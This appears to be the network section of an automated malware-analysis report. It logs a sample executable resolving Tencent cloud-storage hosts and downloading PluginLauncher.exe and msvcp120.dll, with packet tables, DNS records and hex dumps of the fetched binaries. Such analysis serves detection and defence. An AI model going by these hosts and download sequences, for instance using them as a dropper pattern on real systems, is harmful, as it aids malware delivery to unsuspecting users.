Jul 25, 2024 16:04:39.011625051 CEST	443	49735	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:39.011655092 CEST	49735	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:39.011678934 CEST	49735	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:39.011686087 CEST	443	49735	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:39.011749029 CEST	49735	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:39.017281055 CEST	443	49735	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:39.017364979 CEST	49735	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:39.017383099 CEST	443	49735	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:39.017469883 CEST	49735	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:39.018486023 CEST	443	49735	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:39.018547058 CEST	49735	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:39.018563032 CEST	443	49735	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:39.018596888 CEST	49735	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:39.021898985 CEST	443	49735	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:39.021923065 CEST	443	49735	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:39.021970987 CEST	49735	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:39.021979094 CEST	443	49735	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:39.022011995 CEST	49735	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:39.022073984 CEST	49735	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:39.022737980 CEST	443	49735	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:39.022820950 CEST	443	49735	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:39.022847891 CEST	49735	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:39.022877932 CEST	49735	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:39.031115055 CEST	49735	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:39.031137943 CEST	443	49735	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:39.512624979 CEST	49736	443	192.168.2.4	43.152.64.207
Jul 25, 2024 16:04:39.512675047 CEST	443	49736	43.152.64.207	192.168.2.4
Jul 25, 2024 16:04:39.512744904 CEST	49736	443	192.168.2.4	43.152.64.207
Jul 25, 2024 16:04:39.513040066 CEST	49736	443	192.168.2.4	43.152.64.207
Jul 25, 2024 16:04:39.513051987 CEST	443	49736	43.152.64.207	192.168.2.4
Jul 25, 2024 16:04:40.949502945 CEST	443	49736	43.152.64.207	192.168.2.4
Jul 25, 2024 16:04:40.949611902 CEST	49736	443	192.168.2.4	43.152.64.207
Jul 25, 2024 16:04:40.950259924 CEST	443	49736	43.152.64.207	192.168.2.4
Jul 25, 2024 16:04:40.950308084 CEST	49736	443	192.168.2.4	43.152.64.207
Jul 25, 2024 16:04:40.960166931 CEST	49736	443	192.168.2.4	43.152.64.207
Jul 25, 2024 16:04:40.960190058 CEST	443	49736	43.152.64.207	192.168.2.4
Jul 25, 2024 16:04:40.961103916 CEST	443	49736	43.152.64.207	192.168.2.4
Jul 25, 2024 16:04:40.961165905 CEST	49736	443	192.168.2.4	43.152.64.207
Jul 25, 2024 16:04:40.961507082 CEST	49736	443	192.168.2.4	43.152.64.207
Jul 25, 2024 16:04:41.004498959 CEST	443	49736	43.152.64.207	192.168.2.4
Jul 25, 2024 16:04:41.504566908 CEST	443	49736	43.152.64.207	192.168.2.4
Jul 25, 2024 16:04:41.504590034 CEST	443	49736	43.152.64.207	192.168.2.4
Jul 25, 2024 16:04:41.504832983 CEST	49736	443	192.168.2.4	43.152.64.207
Jul 25, 2024 16:04:41.504874945 CEST	443	49736	43.152.64.207	192.168.2.4
Jul 25, 2024 16:04:41.504925013 CEST	49736	443	192.168.2.4	43.152.64.207
Jul 25, 2024 16:04:41.505403042 CEST	443	49736	43.152.64.207	192.168.2.4
Jul 25, 2024 16:04:41.505456924 CEST	49736	443	192.168.2.4	43.152.64.207
Jul 25, 2024 16:04:41.505465031 CEST	443	49736	43.152.64.207	192.168.2.4
Jul 25, 2024 16:04:41.505500078 CEST	443	49736	43.152.64.207	192.168.2.4
Jul 25, 2024 16:04:41.505503893 CEST	49736	443	192.168.2.4	43.152.64.207
Jul 25, 2024 16:04:41.505539894 CEST	49736	443	192.168.2.4	43.152.64.207
Jul 25, 2024 16:04:41.506551981 CEST	49736	443	192.168.2.4	43.152.64.207
Jul 25, 2024 16:04:41.506571054 CEST	443	49736	43.152.64.207	192.168.2.4
Jul 25, 2024 16:04:44.850975037 CEST	49739	443	192.168.2.4	159.75.57.36
Jul 25, 2024 16:04:44.851023912 CEST	443	49739	159.75.57.36	192.168.2.4
Jul 25, 2024 16:04:44.851080894 CEST	49739	443	192.168.2.4	159.75.57.36
Jul 25, 2024 16:04:44.851454020 CEST	49739	443	192.168.2.4	159.75.57.36
Jul 25, 2024 16:04:44.851466894 CEST	443	49739	159.75.57.36	192.168.2.4
Jul 25, 2024 16:04:46.270983934 CEST	443	49739	159.75.57.36	192.168.2.4
Jul 25, 2024 16:04:46.271059990 CEST	49739	443	192.168.2.4	159.75.57.36
Jul 25, 2024 16:04:46.272027969 CEST	443	49739	159.75.57.36	192.168.2.4
Jul 25, 2024 16:04:46.272113085 CEST	49739	443	192.168.2.4	159.75.57.36
Jul 25, 2024 16:04:46.286195993 CEST	49739	443	192.168.2.4	159.75.57.36
Jul 25, 2024 16:04:46.286211014 CEST	443	49739	159.75.57.36	192.168.2.4
Jul 25, 2024 16:04:46.286526918 CEST	443	49739	159.75.57.36	192.168.2.4
Jul 25, 2024 16:04:46.286576033 CEST	49739	443	192.168.2.4	159.75.57.36
Jul 25, 2024 16:04:46.287008047 CEST	49739	443	192.168.2.4	159.75.57.36
Jul 25, 2024 16:04:46.328541994 CEST	443	49739	159.75.57.36	192.168.2.4
Jul 25, 2024 16:04:46.691382885 CEST	443	49739	159.75.57.36	192.168.2.4
Jul 25, 2024 16:04:46.691638947 CEST	443	49739	159.75.57.36	192.168.2.4
Jul 25, 2024 16:04:46.691704035 CEST	49739	443	192.168.2.4	159.75.57.36
Jul 25, 2024 16:04:46.694283009 CEST	49739	443	192.168.2.4	159.75.57.36
Jul 25, 2024 16:04:46.694293022 CEST	443	49739	159.75.57.36	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 16:04:25.335129976 CEST	52791	53	192.168.2.4	1.1.1.1
Jul 25, 2024 16:04:25.655528069 CEST	53	52791	1.1.1.1	192.168.2.4
Jul 25, 2024 16:04:39.178519011 CEST	63106	53	192.168.2.4	1.1.1.1
Jul 25, 2024 16:04:39.511538982 CEST	53	63106	1.1.1.1	192.168.2.4
Jul 25, 2024 16:04:44.533849001 CEST	53434	53	192.168.2.4	1.1.1.1
Jul 25, 2024 16:04:44.849740028 CEST	53	53434	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 25, 2024 16:04:25.335129976 CEST	192.168.2.4	1.1.1.1	0x5aa6	Standard query (0)	wwwdll-1323570959.cos.ap-singapore.myqcloud.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 16:04:39.178519011 CEST	192.168.2.4	1.1.1.1	0x8859	Standard query (0)	www80-1323570959.cos.ap-singapore.myqcloud.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 16:04:44.533849001 CEST	192.168.2.4	1.1.1.1	0x33b7	Standard query (0)	wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 25, 2024 16:04:25.655528069 CEST	1.1.1.1	192.168.2.4	0x5aa6	No error (0)	wwwdll-1323570959.cos.ap-singapore.myqcloud.com	sgp.file.myqcloud.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 25, 2024 16:04:25.655528069 CEST	1.1.1.1	192.168.2.4	0x5aa6	No error (0)	sgp.file.myqcloud.com		43.153.232.151	A (IP address)	IN (0x0001)	false
Jul 25, 2024 16:04:25.655528069 CEST	1.1.1.1	192.168.2.4	0x5aa6	No error (0)	sgp.file.myqcloud.com		43.153.232.152	A (IP address)	IN (0x0001)	false
Jul 25, 2024 16:04:25.655528069 CEST	1.1.1.1	192.168.2.4	0x5aa6	No error (0)	sgp.file.myqcloud.com		43.152.64.193	A (IP address)	IN (0x0001)	false
Jul 25, 2024 16:04:25.655528069 CEST	1.1.1.1	192.168.2.4	0x5aa6	No error (0)	sgp.file.myqcloud.com		43.152.64.207	A (IP address)	IN (0x0001)	false
Jul 25, 2024 16:04:39.511538982 CEST	1.1.1.1	192.168.2.4	0x8859	No error (0)	www80-1323570959.cos.ap-singapore.myqcloud.com	sgp.file.myqcloud.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 25, 2024 16:04:39.511538982 CEST	1.1.1.1	192.168.2.4	0x8859	No error (0)	sgp.file.myqcloud.com		43.152.64.207	A (IP address)	IN (0x0001)	false
Jul 25, 2024 16:04:39.511538982 CEST	1.1.1.1	192.168.2.4	0x8859	No error (0)	sgp.file.myqcloud.com		43.153.232.151	A (IP address)	IN (0x0001)	false
Jul 25, 2024 16:04:39.511538982 CEST	1.1.1.1	192.168.2.4	0x8859	No error (0)	sgp.file.myqcloud.com		43.153.232.152	A (IP address)	IN (0x0001)	false
Jul 25, 2024 16:04:39.511538982 CEST	1.1.1.1	192.168.2.4	0x8859	No error (0)	sgp.file.myqcloud.com		43.152.64.193	A (IP address)	IN (0x0001)	false
Jul 25, 2024 16:04:44.849740028 CEST	1.1.1.1	192.168.2.4	0x33b7	No error (0)	wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com	gz.file.myqcloud.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 25, 2024 16:04:44.849740028 CEST	1.1.1.1	192.168.2.4	0x33b7	No error (0)	gz.file.myqcloud.com		159.75.57.36	A (IP address)	IN (0x0001)	false
Jul 25, 2024 16:04:44.849740028 CEST	1.1.1.1	192.168.2.4	0x33b7	No error (0)	gz.file.myqcloud.com		159.75.57.35	A (IP address)	IN (0x0001)	false
Jul 25, 2024 16:04:44.849740028 CEST	1.1.1.1	192.168.2.4	0x33b7	No error (0)	gz.file.myqcloud.com		159.75.57.69	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

wwwdll-1323570959.cos.ap-singapore.myqcloud.com

www80-1323570959.cos.ap-singapore.myqcloud.com

wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	43.153.232.151	443	7328	C:\Users\user\Desktop\LisectAVT_2403002B_246.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 14:04:27 UTC	141	OUT	GET /PluginLauncher.exe HTTP/1.1 User-Agent: Mozilla/5.0 Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.com Cache-Control: no-cache
2024-07-25 14:04:27 UTC	472	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Content-Length: 22920 Connection: close Accept-Ranges: bytes Content-Disposition: attachment Date: Thu, 25 Jul 2024 14:04:27 GMT ETag: "94079169014abce2f6d26677897d3ca1" Last-Modified: Wed, 20 Mar 2024 10:03:08 GMT Server: tencent-cos x-cos-force-download: true x-cos-hash-crc64ecma: 16004355190225650912 x-cos-request-id: NjZhMjViNmJfZmUxNTc5MWVfMTMyZmJfNjRjODIz x-cos-server-side-encryption: AES256
2024-07-25 14:04:27 UTC	7732	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6e 7c 2e 51 2a 1d 40 02 2a 1d 40 02 2a 1d 40 02 23 65 d3 02 20 1d 40 02 11 43 41 03 28 1d 40 02 11 43 43 03 2b 1d 40 02 11 43 45 03 38 1d 40 02 11 43 44 03 27 1d 40 02 f7 e2 8b 02 28 1d 40 02 b8 43 41 03 29 1d 40 02 2a 1d 41 02 06 1d 40 02 b8 43 49 03 2b 1d 40 02 b8 43 bf 02 2b 1d 40 02 b8 43 42 03 2b 1d 40 02 52 69 63 68 2a 1d 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$n\|.Q@@@#e @CA(@CC+@CE8@CD'@(@CA)@A@CI+@C+@CB+@Rich*@
2024-07-25 14:04:27 UTC	8184	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-07-25 14:04:27 UTC	7004	IN	Data Raw: 74 70 73 3a 2f 2f 77 77 77 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 2f 43 50 53 30 08 06 06 67 81 0c 01 04 01 30 81 84 06 08 2b 06 01 05 05 07 01 01 04 78 30 76 30 24 06 08 2b 06 01 05 05 07 30 01 86 18 68 74 74 70 3a 2f 2f 6f 63 73 70 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 30 4e 06 08 2b 06 01 05 05 07 30 02 86 42 68 74 74 70 3a 2f 2f 63 61 63 65 72 74 73 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 2f 44 69 67 69 43 65 72 74 53 48 41 32 41 73 73 75 72 65 64 49 44 43 6f 64 65 53 69 67 6e 69 6e 67 43 41 2e 63 72 74 30 0c 06 03 55 1d 13 01 01 ff 04 02 30 00 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 2e 3d 88 f1 25 fb 8b 0d d2 fa 8e 65 ae 8c ad 59 7a 10 71 c4 ca f5 3b 2a 5a e5 5d 3e 99 d1 16 5c 3c 09 ce b0 27 4a cc 22 3a fb 69 bf 31 c3 8e 27 22 9d Data Ascii: tps://www.digicert.com/CPS0g0+x0v0$+0http://ocsp.digicert.com0N+0Bhttp://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0U00H.=%eYzq;Z]>\<'J":i1'"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	43.153.232.151	443	7328	C:\Users\user\Desktop\LisectAVT_2403002B_246.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 14:04:30 UTC	135	OUT	GET /msvcp120.dll HTTP/1.1 User-Agent: Mozilla/5.0 Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.com Cache-Control: no-cache
2024-07-25 14:04:30 UTC	472	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Content-Length: 455328 Connection: close Accept-Ranges: bytes Content-Disposition: attachment Date: Thu, 25 Jul 2024 14:04:30 GMT ETag: "fd5cabbe52272bd76007b68186ebaf00" Last-Modified: Mon, 18 Mar 2024 00:32:34 GMT Server: tencent-cos x-cos-force-download: true x-cos-hash-crc64ecma: 9055190654433826812 x-cos-request-id: NjZhMjViNmVfMWFlYzE1MGJfMThhOTdfNjdkNzA5 x-cos-server-side-encryption: AES256
2024-07-25 14:04:30 UTC	7732	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6f ad d2 1d 2b cc bc 4e 2b cc bc 4e 2b cc bc 4e f6 33 77 4e 29 cc bc 4e 2b cc bd 4e f0 cc bc 4e 6d 9d 61 4e 28 cc bc 4e 6d 9d 63 4e 23 cc bc 4e 6d 9d 5d 4e 18 cc bc 4e 6d 9d 5c 4e 65 cc bc 4e 6d 9d 59 4e 2d cc bc 4e 6d 9d 60 4e 2a cc bc 4e 6d 9d 67 4e 2a cc bc 4e 6d 9d 62 4e 2a cc bc 4e 52 69 63 68 2b cc bc 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$o+N+N+N3wN)N+NNmaN(NmcN#Nm]NNm\NeNmYN-Nm`NNmgNNmbN*NRich+N
2024-07-25 14:04:30 UTC	16368	IN	Data Raw: 73 20 64 65 76 69 63 65 20 6c 69 6e 6b 00 00 00 6f 70 65 72 61 74 69 6f 6e 20 63 61 6e 63 65 6c 65 64 00 00 74 6f 6f 20 6d 61 6e 79 20 66 69 6c 65 73 20 6f 70 65 6e 00 70 65 72 6d 69 73 73 69 6f 6e 5f 64 65 6e 69 65 64 00 00 00 61 64 64 72 65 73 73 5f 69 6e 5f 75 73 65 00 00 61 64 64 72 65 73 73 5f 6e 6f 74 5f 61 76 61 69 6c 61 62 6c 65 00 00 00 61 64 64 72 65 73 73 5f 66 61 6d 69 6c 79 5f 6e 6f 74 5f 73 75 70 70 6f 72 74 65 64 00 00 00 00 63 6f 6e 6e 65 63 74 69 6f 6e 5f 61 6c 72 65 61 64 79 5f 69 6e 5f 70 72 6f 67 72 65 73 73 00 00 62 61 64 5f 66 69 6c 65 5f 64 65 73 63 72 69 70 74 6f 72 00 63 6f 6e 6e 65 63 74 69 6f 6e 5f 61 62 6f 72 74 65 64 00 00 63 6f 6e 6e 65 63 74 69 6f 6e 5f 72 65 66 75 73 65 64 00 00 63 6f 6e 6e 65 63 74 69 6f 6e 5f 72 65 73 65 Data Ascii: s device linkoperation canceledtoo many files openpermission_deniedaddress_in_useaddress_not_availableaddress_family_not_supportedconnection_already_in_progressbad_file_descriptorconnection_abortedconnection_refusedconnection_rese
2024-07-25 14:04:30 UTC	8184	IN	Data Raw: 00 00 00 00 00 00 00 00 01 00 00 00 94 6f 00 10 d0 50 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 cc 69 00 10 b8 4d 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 20 6c 00 10 00 00 00 00 e0 00 00 00 00 00 00 00 78 4c 06 10 dc 6a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 51 06 10 9c 6e 00 10 70 71 00 10 d8 64 00 10 a0 75 00 10 00 00 00 00 78 5a 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 cc 6c 00 10 58 49 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 a8 70 00 10 00 00 00 00 01 00 00 00 04 00 00 00 ac 71 00 10 30 48 06 10 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 00 6a 00 10 88 41 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 40 68 00 Data Ascii: oP@iM@ lxLjQnpqduxZ@lXI@pq0H@jA@@h
2024-07-25 14:04:30 UTC	8184	IN	Data Raw: 00 ff 15 0c 92 06 10 83 c4 14 89 5d f0 85 f6 74 06 8d 9f f0 00 00 00 8d 55 f0 8b cb e8 c5 46 00 00 8b c7 e8 fc 28 03 00 c2 04 00 6a 04 b8 7d be 03 10 e8 1f 29 03 00 8b f1 89 75 f0 c7 06 9c 3f 00 10 83 65 fc 00 8b c6 99 52 50 6a 03 ff 15 0c 92 06 10 83 4d fc ff 8d 4e 08 83 c4 0c e8 5a 09 00 00 e8 bd 28 03 00 c3 8d 41 08 c3 51 6a 00 83 c1 08 83 ca ff e8 f4 40 00 00 59 59 c3 55 8b ec 83 e4 f8 51 53 56 8b f1 83 ca ff 57 33 ff 57 8d 5e 08 8b cb e8 d5 40 00 00 59 85 c0 74 04 32 c0 eb 71 33 c0 8d 8e 60 01 00 00 33 d2 40 f0 0f b1 11 85 c0 74 e9 8b c6 99 52 50 6a 04 ff 15 0c 92 06 10 83 c4 0c c7 44 24 0c 01 00 00 00 85 db 74 06 8d be f0 00 00 00 8d 54 24 0c 8b cf e8 04 46 00 00 8b 8e 6c 01 00 00 56 68 40 91 00 10 85 c9 74 06 8b 01 ff 10 eb 19 8b 8e 68 01 00 00 85 Data Ascii: ]tUF(j})u?eRPjMNZ(AQj@YYUQSVW3W^@Yt2q3`3@tRPjD$tT$FlVh@th
2024-07-25 14:04:30 UTC	8184	IN	Data Raw: a8 e8 73 0b 00 00 8b c6 e8 33 09 03 00 c2 04 00 6a 04 b8 f4 c3 03 10 e8 42 09 03 00 8b f1 89 75 f0 c7 06 dc 42 00 10 c7 45 fc 01 00 00 00 8d 4e 60 8b 01 c6 46 58 01 ff 50 08 8b 06 8b ce ff 50 18 8d 8e f8 00 00 00 e8 cd f8 ff ff 83 4d fc ff 8b ce e8 9b 00 00 00 e8 d0 08 03 00 c3 55 8b ec 8b 45 08 56 57 8b f9 33 f6 8b 4d 0c 57 ff 70 04 8b 11 ff 52 10 8b d0 85 d2 74 0a 8d 4f 60 8b 01 52 ff 10 eb 03 6a 03 5e 5f 8b c6 5e 5d c2 08 00 55 8b ec 8b 45 08 56 57 8b f9 33 f6 8b 4d 0c 57 ff 70 04 8b 11 ff 52 10 8b d0 85 d2 74 0b 8d 4f 60 8b 01 52 ff 50 04 eb 03 6a 03 5e 5f 8b c6 5e 5d c2 08 00 55 8b ec 8b 89 08 01 00 00 85 c9 74 1b 8b 11 56 8b 75 08 8d 46 08 50 ff 52 08 8b 06 8b ce 6a 01 ff 50 04 5e 5d c2 04 00 e8 84 8e 00 00 cc 6a 04 b8 2d c4 03 10 e8 60 08 03 00 8b Data Ascii: s3jBuBEN`FXPPMUEVW3MWpRtO`Rj^_^]UEVW3MWpRtO`RPj^_^]UtVuFPRjP^]j-`
2024-07-25 14:04:30 UTC	8184	IN	Data Raw: 89 7e 58 e8 9c e9 ff ff 89 7e 5c 83 4d fc ff 8b 4d e8 85 c9 74 14 8b 11 8d 45 d8 3b c8 0f 95 c0 0f b6 c0 50 ff 52 10 89 7d e8 85 f6 74 06 8d be e0 00 00 00 89 be 30 01 00 00 e8 09 e9 02 00 c2 08 00 55 8b ec 56 8b f1 e8 c0 00 00 00 f6 45 08 01 74 08 56 ff 15 2c 93 06 10 59 8b c6 5e 5d c2 04 00 55 8b ec f6 45 08 01 56 8b f1 c7 06 78 43 00 10 74 08 56 ff 15 2c 93 06 10 59 8b c6 5e 5d c2 04 00 55 8b ec f6 45 08 01 56 8b f1 c7 06 d4 3f 00 10 74 08 56 ff 15 2c 93 06 10 59 8b c6 5e 5d c2 04 00 55 8b ec 56 8b f1 e8 15 00 00 00 f6 45 08 01 74 08 56 ff 15 2c 93 06 10 59 8b c6 5e 5d c2 04 00 6a 04 b8 80 c8 03 10 e8 96 e8 02 00 8b f1 89 75 f0 c7 06 38 42 00 10 83 65 fc 00 eb 0d 6a 00 8b ce e8 87 4a 00 00 84 c0 74 0b 8b ce e8 d8 4a 00 00 84 c0 74 e8 8b ce e8 f0 4a 00 Data Ascii: ~X~\MMtE;PR}t0UVEtV,Y^]UEVxCtV,Y^]UEV?tV,Y^]UVEtV,Y^]ju8BejJtJtJ
2024-07-25 14:04:30 UTC	8184	IN	Data Raw: 4b f0 01 00 59 6a 0b 59 8b f0 8d 7b 08 f3 a5 8d 4d 90 e8 da f5 ff ff 8b c3 e8 1e c9 02 00 c2 04 00 55 8b ec 8b 45 0c 83 ec 2c 53 8b d9 56 57 89 43 04 8d 45 d4 50 c7 03 44 15 00 10 e8 0e f0 01 00 59 6a 0b 59 8d 7b 08 8b f0 f3 a5 5f 5e 8b c3 5b 8b e5 5d c2 08 00 6a 38 b8 03 cc 03 10 e8 0b c9 02 00 8b 7d 08 33 f6 8b de 89 5d f0 85 ff 74 44 39 37 75 40 6a 34 ff 15 30 93 06 10 59 89 45 08 89 75 fc 85 c0 74 1e 8b 4d 0c e8 e7 f9 ff ff 50 8d 4d bc e8 3e f4 ff ff 8b 4d 08 43 56 50 e8 7d ff ff ff 8b f0 89 37 f6 c3 01 74 08 8d 4d bc e8 3c f5 ff ff 6a 02 58 e8 7f c8 02 00 c3 6a 00 e8 08 ff ff ff c3 55 8b ec 8b 45 08 89 41 04 8b c1 c7 01 70 15 00 10 5d c2 04 00 83 61 04 00 c7 01 70 15 00 10 c3 55 8b ec 8b 45 0c 8b 49 0c 0f b6 d0 66 8b 45 08 6a 00 66 85 04 51 58 0f 95 Data Ascii: KYjY{MUE,SVWCEPDYjY{_^[]j8}3]tD97u@j40YEutMPM>MCVP}7tM<jXjUEAp]apUEIfEjfQX
2024-07-25 14:04:30 UTC	16384	IN	Data Raw: 8b 4c 31 38 e8 93 f9 ff ff 0f b7 c0 8b c8 b8 ff ff 00 00 66 3b c1 75 20 8b 06 8b 48 04 03 ce 8b 41 0c 83 c8 01 83 79 38 00 75 03 83 c8 04 6a 00 50 e8 3f ed ff ff eb 4a 8b 07 51 6a 48 8b cf ff 50 10 84 c0 74 3c 8b 06 8b 40 04 8b 4c 30 38 e8 6b f9 ff ff eb b3 8b 4d ec 8b 01 8b 50 04 03 d1 8b 42 0c 83 c8 04 83 7a 38 00 75 03 83 c8 04 6a 01 50 8b ca e8 fc ec ff ff b8 7b 0a 01 10 c3 8b 75 ec 83 4d fc ff 8b 0e 8b 49 04 03 ce 83 79 0c 00 75 04 b0 01 eb 19 8b 41 0c 83 c8 02 83 79 38 00 75 03 83 c8 04 6a 00 50 e8 c7 ec ff ff 32 c0 e8 8f a8 02 00 c2 04 00 55 8b ec 53 8b 5d 08 56 53 8b f1 e8 7f 01 00 00 84 c0 74 1c 83 7e 14 10 72 04 8b 06 eb 02 8b c6 ff 75 0c 2b d8 8b ce 53 56 e8 b9 fa ff ff eb 43 57 8b 7d 0c 8b ce 6a 00 57 e8 ed 00 00 00 84 c0 74 2e 83 7e 14 10 72 Data Ascii: L18f;u HAy8ujP?JQjHPt<@L08kMPBz8ujP{uMIyuAy8ujP2US]VSt~ru+SVCW}jWt.~r
2024-07-25 14:04:30 UTC	16352	IN	Data Raw: 85 db 74 12 53 ff 75 08 ff 75 f0 e8 f4 68 02 00 8b 4d fc 83 c4 0c 01 5d 08 03 cb 8b 55 f8 13 55 10 2b f3 89 55 f8 8b 55 f4 1b 7d 10 8b 42 30 29 18 8b 42 20 01 18 eb 28 8b 4d f4 8b 5d 08 8b 11 0f b6 03 50 ff 52 0c 83 f8 ff 74 2c 8b 4d fc 43 83 c1 01 89 5d 08 83 55 f8 00 83 c6 ff 83 d7 ff 8b 5d f4 89 4d fc 85 ff 0f 8f 5c ff ff ff 7c 08 85 f6 0f 85 52 ff ff ff 8b 4d fc 8b 55 f8 5e 5f 8b c1 5b 8b e5 5d c2 0c 00 6a 08 b8 1a d2 03 10 e8 e1 68 02 00 8b f1 89 75 ec 33 d2 89 55 f0 39 55 10 74 17 c7 06 ec 1c 00 10 c7 46 18 24 1c 00 10 89 55 fc c7 45 f0 01 00 00 00 8b 06 ff 75 0c ff 75 08 8b 40 04 c7 04 06 e8 1c 00 10 8b 06 8b 48 04 8d 41 e8 89 44 31 fc 8b 06 89 56 08 89 56 0c 8b 48 04 03 ce e8 bd f6 ff ff 8b c6 e8 52 68 02 00 c2 0c 00 8b 41 e8 8b 40 04 c7 44 08 e8 Data Ascii: tSuuhM]UU+UU}B0)B (M]PRt,MC]U]M\\|RMU^_[]jhu3U9UtF$UEuu@HAD1VVHRhA@D
